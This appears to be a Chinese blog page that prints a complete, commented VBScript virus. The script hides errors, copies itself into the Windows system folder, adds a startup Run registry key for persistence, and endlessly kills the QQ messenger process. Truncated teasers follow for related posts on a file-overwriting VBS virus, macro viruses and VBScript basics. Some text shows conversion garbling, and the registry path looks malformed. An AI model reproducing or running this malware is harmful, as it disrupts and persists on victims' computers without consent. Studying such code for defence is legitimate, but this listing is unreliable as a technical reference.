'virus code starts here
'容錯控制,防止發生異常丟擲而導致程式崩潰
on error resume next
'建立檔案系統物件
set fso=createobject("scripting.filesystemobject")
'獲得系統資料夾
set sysdir=fso.getspecialfolder(1)
set filespec=sysdir&"/hlx0q.vbs"
'建立windows指令碼殼物件
set ws=createobject("wscript.shell")
'將病毒檔案拷貝到系統資料夾下並改名
fso.getfile(wscript.scriptfullname).copy(filespec)
'寫登錄檔,設定啟動時自動載入項
ws.regwrite "hklm/software/microsoft/windows/currentversion/run/hlx0q","hlx0q.vbs"
'獲得qq服務程序,您可以通過按「ctrl+alt+del」檢視程序列表,獲得程序映像名稱
do'表示本地主機
strcomputer = "."
'獲得程序名
strwql="select * from win32_process where name = 'qq.exe'"
'獲得vmi物件
set objwmiservice = getobject("winmgmts:" _
& "!//" & strcomputer & "/root/cimv2")
set colprocesslist = objwmiservice.execquery(strwql)
'在程序列表中列舉目標程序,一旦發現便中斷它執行
for each objprocess in colprocesslist
objprocess.terminate()
next
loop
'登出物件
set fso=nothing
set sysdir=nothing
set ws=nothing
set filename=nothing
set objwmiservice=nothing
set objprocess=nothing
vbs 病毒學習
說明 作者對某些 進行了修改。該檔案是乙個完整的程式。該檔案執行之後,會尋找硬碟上所有滿足條件的檔案,對其進行強制性覆蓋 滿足條件的檔案資料將全部丟失 並再建立乙個相同檔名但後帶.vbs的檔案。因此,請注意設立好破壞測試條件,千萬不要對他人進行測試,否則,一切後果自負。dim folder,fso,...
巨集與巨集病毒 學習筆記
巨集病毒word巨集病毒 若對巨集或巨集病毒有一定了解可直接跳轉於此 經典巨集病毒 參考文獻 近日,在某個技術 上看到了一篇關於巨集病毒的技術部落格,並且在幾個月前在虛擬機器上做了乙個簡單的巨集病毒實驗,但並未認真研究過其原理,今天忽然有了一點莫名的興致,藉著這個莫名而來的興趣研究了下巨集和巨集病毒...
vbs 基礎學習 二
要點 1.inputbox 對話方塊內容 對話方塊標題 2.注意 vbscript中不允許在申明變數的時候同時給變數賦值。但是允許在一行 內同時對兩個變數進行賦值,中間用冒號分隔 3.轉換型別 cbool函式將變數轉換成布林值 cbyte函式將變數轉換為0到255之間的整數。ccur函式 cdbl函...